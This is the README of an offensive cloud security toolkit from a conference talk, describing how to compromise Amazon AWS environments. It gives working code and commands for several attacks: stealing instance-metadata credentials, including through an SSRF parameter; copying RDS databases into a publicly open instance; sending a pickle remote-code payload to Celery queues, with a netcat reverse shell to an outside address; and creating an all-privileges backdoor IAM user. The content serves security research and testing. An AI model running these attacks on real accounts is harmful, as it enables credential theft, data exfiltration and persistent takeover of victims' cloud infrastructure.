Nimbostratus
Tools for fingerprinting and exploiting Amazon cloud infrastructures. These tools are a PoC I developed for my "Pivoting in Amazon clouds" talk, built using the great boto library for accessing Amazon's API.
The nimbostratus toolset is usually used together with nimbostratus-target, which helps you set up a legal environment where this tool can be tested.
If you need help understanding what this toolset is all about, both my article on "Pivoting in Amazon clouds" and this speaker deck will be really useful. The guys at SecTor recorded my talk, which can be found here.
Feel free to report bugs, fork and send pull-requests. You can also drop me a line at @w3af.
Installation
git clone git@github.com:andresriancho/nimbostratus.git
cd nimbostratus
pip install -r requirements.txt
Usage
Providing AWS credentials
Some nimbostratus sub-commands require you to provide AWS credentials. They are provided using the following command line arguments:

--access-key
--secret-key
--token, which is only used when the credentials were extracted from the instance profile.
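For example, a sub-command that accepts these flags can be run with credentials dumped from an instance profile (the key values below are placeholders):

$ nimbostratus dump-permissions --access-key=AKIA... \
                                --secret-key=... \
                                --token=...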
Dump credentials
Identifies the credentials available on this host and prints them to the console. This is usually the first command to run after gaining access to an EC2 instance.
$ nimbostratus dump-credentials
Found credentials
Access key: ...
Secret key: ...
Once you've got the credentials from an EC2 instance you've exploited, you can continue to work from any other host with internet access (remember: EC2 instances are in many cases spawned for a specific task and then terminated).
IMPORTANT: This will extract information from boto's credential configuration sources and from the instance meta-data. If the system uses other libraries to connect to AWS, the credentials won't be dumped.
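For reference, this is roughly how instance-profile credentials are exposed by the meta-data service. The following is only a minimal sketch of that lookup (assuming the older IMDSv1 endpoint, which needs no session token), not the code nimbostratus itself uses:

import json
import urllib.request

BASE = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/'

# The endpoint first lists the role names attached to the instance profile...
role = urllib.request.urlopen(BASE).read().decode().splitlines()[0]
# ...and each role name resolves to a JSON document with temporary credentials.
creds = json.loads(urllib.request.urlopen(BASE + role).read().decode())

print('Access key:', creds['AccessKeyId'])
print('Secret key:', creds['SecretAccessKey'])
print('Token:', creds['Token'])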
Dump permissions
This tool dumps all permissions for the provided credentials. It is commonly run right after dump-credentials to find out which permissions are available to you.
$ nimbostratus dump-permissions --access-key=... --secret-key=...
Starting dump-permissions
These credentials belong to low_privileged_user, not to the root account
Getting access keys for user low_privileged_user
User for key AKIAIV...J6KVA is low_privileged_user
{u'Statement': [{u'Action': u'iam:*',
u'Effect': u'Allow',
u'Resource': u'*',
u'Sid': u'Stmt1377108934836'},
{u'Action': u'sqs:*',
u'Effect': u'Allow',
u'Resource': u'*',
u'Sid': u'Stmt1377109045369'}]}
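If you want to reproduce this lookup by hand, a rough equivalent using boto3 (the successor of the boto library nimbostratus uses) looks like this; the user and policy names are simply whatever the credentials can see:

import boto3

iam = boto3.client('iam', aws_access_key_id='...', aws_secret_access_key='...')

# Which user do these keys belong to?
user = iam.get_user()['User']['UserName']

# Inline policies attached directly to that user (group and managed
# policies would need separate calls and are not covered by this sketch).
for policy_name in iam.list_user_policies(UserName=user)['PolicyNames']:
    document = iam.get_user_policy(UserName=user, PolicyName=policy_name)
    print(document['PolicyDocument'])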
Dump instance meta-data
All EC2 instances have meta-data which is accessible via http://169.254.169.254/latest/meta-data/. This tool will extract all the important information from the metadata and show it to you.
Keep in mind that each EC2 instance has its own http://169.254.169.254/ meta-data provider, and running this command on different instances will yield different results.
Extract meta-data for the instance where the command is being run:
$ nimbostratus dump-ec2-metadata
Starting dump-ec2-metadata
...
Instance type: t1.micro
AMI ID: ami-a02f66f2
Security groups: django_frontend_nimbostratus_sg
Availability zone: ap-southeast-1a
Architecture: x86_64
Private IP: 10.130.81.89
User data script was written to user-data.txt
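The user data script mentioned in the last line comes from the same meta-data service. A minimal sketch of fetching it by hand (assuming the instance has user data and exposes IMDSv1):

import urllib.request

# /latest/user-data returns the raw user data script (404 if none was set).
data = urllib.request.urlopen('http://169.254.169.254/latest/user-data').read()

with open('user-data.txt', 'wb') as fh:
    fh.write(data)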
Extract meta-data from a remote instance using an exploit defined in core.utils.mangle.mangle:
$ nimbostratus dump-ec2-metadata --mangle-function=core.utils.mangle.mangle
Starting dump-ec2-metadata
Request http://target.com/?url=http://169.254.169.254/...ta-data/
Request http://target.com/?url=http://169.254.169.254/...ta-data/instance-type
Request http://target.com/?url=http://169.254.169.254/...ta-data/instance-id
...
Instance type: t1.micro
AMI ID: ami-a02f66f2
Security groups: django_frontend_nimbostratus_sg
Availability zone: ap-southeast-1a
Architecture: x86_64
Private IP: 10.130.81.89
User data script was written to user-data.txt
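The mangle function is user-supplied code that rewrites each meta-data URL so it is fetched through the vulnerable application instead of directly. A sketch matching the output above (the exact signature nimbostratus expects may differ, so check core/utils/mangle.py; target.com and its url parameter are assumptions about the vulnerable site):

def mangle(url):
    # Route the meta-data request through an SSRF-style "fetch this URL"
    # parameter exposed by the target web application.
    return 'http://target.com/?url=' + url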
Create DB snapshot
In some cases you've got Amazon credentials which allow you to access the RDS API but no access to the database itself (i.e. no MySQL user). This tool lets you access the information stored in that database by creating a snapshot and restoring it as a new instance you control.
$ nimbostratus snapshot-rds --access-key=... \
--secret-key=... \
--password foolmeonce --rds-name nimbostratus \
--region ap-southeast-1
Starting snapshot-rds
Waiting for snapshot to complete in AWS... (this takes at least 5m)
Waiting...
Waiting for restore process in AWS... (this takes at least 5m)
Waiting...
Creating a DB security group which allows connections from any location and
applying it to the newly created RDS instance. Anyone can connect to this
MySQL instance at:
- Host: restored....rds.amazonaws.com
- Port: 3306
Using root:
mysql -u root -pfoolmeonce -h restored....rds.amazonaws.com
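Under the hood this is a snapshot-then-restore trick against the RDS API. A condensed sketch with boto3 (identifiers, region and password are placeholders; the real tool also creates the wide-open DB security group shown in the output above):

import boto3

rds = boto3.client('rds', region_name='ap-southeast-1',
                   aws_access_key_id='...', aws_secret_access_key='...')

# Snapshot the target instance, then wait until the snapshot is usable.
rds.create_db_snapshot(DBInstanceIdentifier='nimbostratus',
                       DBSnapshotIdentifier='nimbostratus-snap')
rds.get_waiter('db_snapshot_available').wait(DBSnapshotIdentifier='nimbostratus-snap')

# Restore it into a brand new instance we fully control...
rds.restore_db_instance_from_db_snapshot(DBInstanceIdentifier='restored-nimbostratus',
                                         DBSnapshotIdentifier='nimbostratus-snap',
                                         PubliclyAccessible=True)

# ...and reset the master password so we can log in to the copy
# (in practice, wait for the instance to become available first).
rds.modify_db_instance(DBInstanceIdentifier='restored-nimbostratus',
                       MasterUserPassword='foolmeonce',
                       ApplyImmediately=True)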
Inject raw Celery message
Celery warns developers about the insecure pickle serialization method, but of course you'll find deployments like this in real life. This tool checks whether the instance it runs on has access to SQS, whether there is a Celery queue in SQS, verifies that the queue is using pickle, and finally injects a raw message that will execute arbitrary commands when un-pickled.
$ nimbostratus celery-pickle-exploit --access-key=... \
--secret-key=... --reverse 1.2.3.4:4000 \
--queue-name nimbostratus-celery --region ap-southeast-1
Starting celery-exploit
SQS queue nimbostratus-celery is vulnerable
We can write to the SQS queue.
Start a netcat to listen for connections at 1.2.3.4:4000 and press enter.
Sent payload to SQS, wait for the reverse connection!
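The dangerous part is the pickle payload itself: any object with a __reduce__ method runs code when the Celery worker un-pickles the message. A minimal sketch of such a payload (the netcat reverse shell command is only illustrative):

import os
import pickle

class RunCommand(object):
    # pickle calls __reduce__ to decide how to rebuild the object;
    # returning (os.system, (cmd,)) makes deserialization execute cmd.
    def __reduce__(self):
        return (os.system, ('nc 1.2.3.4 4000 -e /bin/sh',))

payload = pickle.dumps(RunCommand())
# nimbostratus wraps a payload like this in a raw Celery message and
# writes it to the vulnerable SQS queue.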
Create new user
If you've got credentials which allow you to create a new user using IAM, this tool will create one (with permissions to access all Amazon resources) and return its API key and secret.
$ nimbostratus create-iam-user --access-key=... --secret-key=...
Starting create-iam-user
Trying to create user "bdkgpnenu"
User "bdkgpnenu" created
Trying to create user "bdkgpnenu" access keys
Created access keys for user bdkgpnenu. Access key: ..., access secret: ...
Created user bdkgpnenu with ALL PRIVILEGES. User information:
* Access key: ...
* Secret key: ...
* Policy name: nimbostratusbdkgpnenu
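The steps in that output map to three IAM API calls. A rough boto3 equivalent (user and policy names are placeholders taken from the output above; the policy document is the catch-all that gives the new user full access):

import json
import boto3

iam = boto3.client('iam', aws_access_key_id='...', aws_secret_access_key='...')

iam.create_user(UserName='bdkgpnenu')

# Attach an inline policy that allows every action on every resource.
iam.put_user_policy(UserName='bdkgpnenu',
                    PolicyName='nimbostratusbdkgpnenu',
                    PolicyDocument=json.dumps({'Version': '2012-10-17',
                                               'Statement': [{'Effect': 'Allow',
                                                              'Action': '*',
                                                              'Resource': '*'}]}))

keys = iam.create_access_key(UserName='bdkgpnenu')['AccessKey']
print(keys['AccessKeyId'], keys['SecretAccessKey'])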
What's a nimbostratus anyways?
Nimbostratus is a type of cloud. If you've ever started a project, you know how hard it is to name it... so I just chose something that sounded "cool" and was "cloud-related".